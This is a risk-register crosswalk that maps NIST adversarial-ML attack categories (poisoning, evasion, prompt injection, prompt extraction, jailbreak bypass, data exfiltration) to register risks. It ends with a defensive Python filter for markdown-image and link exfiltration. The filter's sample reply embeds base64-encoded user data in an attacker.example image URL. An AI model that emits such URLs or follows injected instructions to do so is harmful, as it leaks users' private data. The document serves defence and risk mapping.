DARR
Reverse crosswalk

NIST AI 100-2e2025 Adversarial ML

28 entries, all 28 mapped to canonical risks (27 with clear confidence, one partial). Each entry below is shown with the canonical risk it maps to; where a mapping is partial, the note says which register risks cover it.

| Framework entry | Description | Disposition | Register mapping | Confidence | Note |
|---|---|---|---|---|---|
| NISTAML.01 Availability Violations | A disruption of the ability of other users or processes to obtain timely and reliable access to an AI system's outputs or functionality (availability breakdown). | Mapped | MR-015 | Clear | Availability breakdown of the AI system is the register's general AI availability-attack risk (MR-015); denial of service and cost-harvesting (denial of wallet) are the MITRE ATLAS-anchored sub-risks. |
| NISTAML.02 Integrity Violations | An AI system being forced to misperform against its intended objectives, producing outputs or predictions that align with the attacker's objective. | Mapped | MR-012, MR-014, MR-010 | Clear | Integrity violations are realised through evasion (MR-012), poisoning and backdoors (MR-014) and prompt injection (MR-010); the MITRE ATLAS integrity-erosion and trusted-output-manipulation sub-risks apply. |
| NISTAML.03 Privacy Compromises | The unauthorized access of restricted or proprietary information that is part of an AI system, including information about a model's training data, weights or architecture, or sensitive information that the model accesses (e.g. a RAG knowledge base). | Mapped | MR-017, MR-009, MR-016 | Clear | Privacy compromise spans privacy-invasive inference (MR-017), leakage of personal or sensitive data (MR-009) and model or data extraction (MR-016). |
| NISTAML.04 Misuse Violations | Misuse enablement: a circumvention of technical restrictions imposed by the AI system's owner on its use, such as restrictions designed to prevent a GenAI system from producing outputs that could cause harm to others. | Mapped | MR-032, MR-010.2 | Clear | Misuse enablement (circumventing owner-imposed safety restrictions, e.g. jailbreaks) maps to misuse or repurposing (MR-032) achieved via guardrail bypass (MR-010.2). |
| NISTAML.05 Supply Chain Attacks | Attacks that compromise components introduced through the AI supply chain, such as poisoned third-party data or a poisoned model published to a repository. | Mapped | MR-018, MR-014 | Clear | Supply-chain attacks that introduce poisoned data or models map to the AI supply-chain risk (MR-018) and to data and model poisoning (MR-014). |
| NISTAML.011 Model Poisoning (availability) | A poisoning attack which operates through model control (the attacker can modify the trained model parameters), here aimed at degrading availability. | Mapped | MR-014 | Clear | Model poisoning through model control is direct manipulation or backdoor insertion under data and model poisoning (MR-014). |
| NISTAML.012 Clean-label Poisoning | A poisoning attack in which the adversary controls training samples but cannot change their labels (the label-limit capability). | Mapped | MR-014 | Clear | Clean-label poisoning is a training-data poisoning variant under MR-014. |
| NISTAML.013 Data Poisoning | A poisoning attack in which an adversary controls part of the training data. | Mapped | MR-014 | Clear | Data poisoning is squarely MR-014, with MITRE ATLAS sub-risks for training-data poisoning and poisoned datasets published for ingestion. |
| NISTAML.014 Energy-latency | An attack that exploits the performance dependency on hardware and model optimizations to negate the effects of hardware optimizations, increase computational latency, increase hardware temperature, and massively increase the amount of energy consumed (e.g. sponge examples). | Mapped | MR-015 | Clear | Energy-latency (sponge) attacks degrade availability and inflate compute cost, mapping to general AI availability attacks (MR-015) and its denial-of-service and denial-of-wallet sub-risks. |
| NISTAML.015 Indirect Prompt Injection | A type of prompt injection executed through resource control (adversary-controlled external data the model ingests) rather than through user-provided input as in a direct prompt injection. | Mapped | MR-010.9 | Clear | Indirect prompt injection via adversary-controlled external data is the register's indirect prompt injection sub-risk (MR-010.9). |
| NISTAML.018 Prompt Injection | An attack which exploits the concatenation of untrusted input with a prompt constructed by a higher-trust party such as the application designer. | Mapped | MR-010, MR-010.1 | Clear | Prompt injection is MR-010 directly, with the deployed-LLM prompt injection sub-risk (MR-010.1). |
| NISTAML.021 Clean-label Backdoor | A backdoor poisoning attack mounted without control over training-data labels (a clean-label variant of backdoor poisoning). | Mapped | MR-014 | Clear | Clean-label backdoor is a backdoor-insertion variant under data and model poisoning (MR-014). |
| NISTAML.022 Evasion | Modifying test samples to create adversarial examples that the model misclassifies at inference time, without altering the model. | Mapped | MR-012 | Clear | Evasion via adversarial examples is the register's adversarial examples and evasion risk (MR-012). |
| NISTAML.023 Backdoor Poisoning | A poisoning attack that causes a model to perform an adversary-selected behaviour in response to inputs that follow a particular backdoor pattern. | Mapped | MR-014 | Clear | Backdoor poisoning maps to MR-014 with the direct model manipulation and backdoor insertion sub-risk. |
| NISTAML.024 Targeted Poisoning | A poisoning attack that changes the prediction on a small number of targeted samples. | Mapped | MR-014 | Clear | Targeted poisoning is a training-data poisoning variant under MR-014. |
| NISTAML.025 Black-box Evasion | An evasion attack mounted with only query access and no knowledge of the model's parameters or architecture (black-box setting). | Mapped | MR-012 | Clear | Black-box evasion is an evasion attack under MR-012 conducted with query access only. |
| NISTAML.026 Model Poisoning (integrity) | A poisoning attack which operates through model control, here aimed at violating integrity (causing targeted misclassification or adversary-selected behaviour). | Mapped | MR-014 | Clear | Model poisoning for integrity maps to MR-014 (direct model manipulation and backdoor insertion). |
| NISTAML.027 Misaligned Outputs | Integrity attacks (often via indirect prompt injection) that cause a GenAI system to become untrustworthy and generate content that deviates from benign behaviour to align with the attacker's objectives (e.g. incorrect summaries, attacker-specified content, suppressed sources, hijacked agents). | Mapped | MR-010.4, MR-071 | Clear | Misaligned outputs are produced via indirect prompt injection that manipulates trusted output (MR-010.4); the agent-hijack variant is MR-071. |
| NISTAML.031 Model Extraction | A type of privacy attack that extracts details of the model architecture and/or parameters. | Mapped | MR-016 | Clear | Model extraction is the register's model theft and extraction risk (MR-016), whether via the inference API or white-box access. |
| NISTAML.032 Reconstruction | Privacy attacks that reconstruct sensitive data in a model's training data from aggregate information (data reconstruction). | Mapped | MR-009, MR-017 | Partial | Data reconstruction has no dedicated register risk; it is covered by leakage of sensitive data (MR-009) and privacy-invasive inference (MR-017). |
| NISTAML.033 Membership Inference | A data privacy attack to determine whether a data sample was part of the training set of a machine learning model. | Mapped | MR-017 | Clear | Membership inference is the register's privacy-invasive inference and re-identification risk (MR-017). |
| NISTAML.034 Property Inference | A data privacy attack that infers a global property about the training data of a machine learning model. | Mapped | MR-017 | Clear | Property inference is a privacy-invasive inference attack under MR-017. |
| NISTAML.035 Prompt Extraction | An attack that tries to divulge the system prompt or other information in the context of a large language model that would normally be hidden from a user. | Mapped | MR-013.2, MR-013 | Clear | Prompt extraction is system-prompt and instruction extraction (MR-013.2) under disclosure of confidential or proprietary information (MR-013). |
| NISTAML.036 Leaking information from user interactions | An indirect prompt injection that instructs a model to persuade the end user to reveal information, then exfiltrates it (e.g. by querying an attacker-controlled URL or via markdown image rendering). | Mapped | MR-009.1, MR-010.9 | Clear | Leaking information from user interactions is prompt-induced leakage of sensitive data (MR-009.1) driven by indirect prompt injection (MR-010.9). |
| NISTAML.037 Training Data Attacks | Training-data extraction: the ability of an attacker to extract the training data of a generative model by prompting the model with specific inputs. | Mapped | MR-009 | Clear | Training-data extraction surfaces memorized sensitive data, mapping to leakage of personal or sensitive data (MR-009). |
| NISTAML.038 Data Extraction | Extraction of memorized training data or other sensitive context from a generative model through crafted queries (information-extraction attacks). | Mapped | MR-009 | Clear | Data extraction of memorized content maps to leakage of personal or sensitive data in outputs (MR-009). |
| NISTAML.039 Compromising connected resources | Prompt injection attacks that cause a GenAI system to leak or exfiltrate private information from the restricted resources it can access (e.g. an email client forwarding messages to an attacker inbox; querying an attacker-controlled URL with user data). | Mapped | MR-020, MR-071.6 | Clear | Compromising connected resources uses injection to exfiltrate data from tools the model can reach, mapping to insecure tool/integration (MR-020) and data exfiltration through agent tool invocation (MR-071.6). |
| NISTAML.051 Model Poisoning (supply chain) | Publishing a poisoned model (or poisoned data) into the AI supply chain so that downstream users inherit adversary-controlled behaviour. | Mapped | MR-018, MR-018.2, MR-014 | Clear | Supply-chain model poisoning maps to the AI supply-chain risk (MR-018), poisoned models published to registries (MR-018.2) and data and model poisoning (MR-014). |

Descriptions are each source framework's own text, where it provides one; long entries are clipped here.
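The exfiltration channel named under NISTAML.036 and NISTAML.039 (the model is induced to place user data in a URL on an attacker-controlled host, which the client then fetches when it renders a markdown image or the user follows a link) is one of the few entries in this crosswalk with a concrete, application-side check. The following is an added example, not code from the NIST document or from the DARR register: a Python output-egress filter that flags and neutralizes markdown images, markdown links and bare URLs in a model reply whose host is outside an allowlist. `ALLOWED_HOSTS`, the `attacker.example` host and the two sample replies are constructed for the example; a real deployment would load the allowlist from configuration. The filter goes beyond the single markdown-image case in the entry text and also covers links and bare URLs, since the same smuggling pattern works through all three.

```python
import base64
import re
from urllib.parse import urlparse

# Hosts the client may fetch images from or link to. Hypothetical values; a real deployment
# loads these from configuration. Any other host is treated as a possible exfiltration
# endpoint, because a rendered markdown image is fetched with no user click at all.
ALLOWED_HOSTS = {"cdn.example.com", "docs.example.com"}

# Markdown image ![alt](url), markdown link [text](url) (not preceded by '!'), bare URL.
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")
MD_LINK = re.compile(r"(?<!!)\[[^\]]*\]\(([^)\s]+)\)")
BARE_URL = re.compile(r"https?://[^\s)\]]+")


def _host_allowed(url: str, allowed_hosts) -> bool:
    return (urlparse(url).hostname or "").lower() in allowed_hosts


def _carries_payload(url: str) -> bool:
    """A query string, or a long base64-looking path segment, is the usual carrier for
    data the injected instruction told the model to smuggle out."""
    parsed = urlparse(url)
    if parsed.query:
        return True
    return any(
        len(seg) >= 32 and re.fullmatch(r"[A-Za-z0-9+/=_-]+", seg)
        for seg in parsed.path.split("/")
    )


def find_exfil_urls(model_output: str, allowed_hosts=ALLOWED_HOSTS):
    """Return one finding per distinct URL whose host is outside the allowlist."""
    findings, seen = [], set()
    for kind, pattern in (("image", MD_IMAGE), ("link", MD_LINK), ("url", BARE_URL)):
        for m in pattern.finditer(model_output):
            url = m.group(1) if pattern.groups else m.group(0)
            if url in seen or _host_allowed(url, allowed_hosts):
                continue
            seen.add(url)
            findings.append({
                "kind": kind,
                "url": url,
                "host": urlparse(url).hostname or "",
                "carries_payload": _carries_payload(url),
            })
    return findings


def neutralize(model_output: str, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Rewrite the reply so the client cannot fetch or follow untrusted URLs: images to
    untrusted hosts are removed (zero-click fetch), links are removed, bare URLs defanged."""
    def img_sub(m):
        return m.group(0) if _host_allowed(m.group(1), allowed_hosts) else "[image removed: untrusted host]"

    def link_sub(m):
        return m.group(0) if _host_allowed(m.group(1), allowed_hosts) else "[link removed: untrusted host]"

    def bare_sub(m):
        return m.group(0) if _host_allowed(m.group(0), allowed_hosts) else "hxxp" + m.group(0)[4:]

    out = MD_IMAGE.sub(img_sub, model_output)
    out = MD_LINK.sub(link_sub, out)
    return BARE_URL.sub(bare_sub, out)


# Constructed sample replies (not taken from the NIST document). The second is what a reply
# looks like after an indirect prompt injection in a retrieved page instructed the model to
# encode the user's earlier message into an image URL on the attacker's server.
BENIGN_REPLY = (
    "Here is the Q3 chart: ![q3](https://cdn.example.com/q3.png) "
    "and the full [report](https://docs.example.com/q3)."
)
_SMUGGLED = base64.urlsafe_b64encode(b"user=alice; account=4417").decode()
INJECTED_REPLY = (
    "Summary complete. "
    f"![](https://attacker.example/p.png?d={_SMUGGLED}) "
    "For more detail see [this page](https://attacker.example/r?u=alice) "
    "or https://attacker.example/faq for background."
)

if __name__ == "__main__":
    for f in find_exfil_urls(INJECTED_REPLY):
        print(f"{f['kind']:5} {f['host']:18} payload={f['carries_payload']} {f['url']}")
    print(neutralize(INJECTED_REPLY))
```

The image case is the one to prioritise: a link needs the user to click, but an `<img>` rendered from the reply is requested by the browser immediately, so the query string reaches the attacker's server before anyone reads the message. Run the filter on the model output before it reaches the renderer, and log the findings as a detection signal for MR-010.9 rather than silently dropping them.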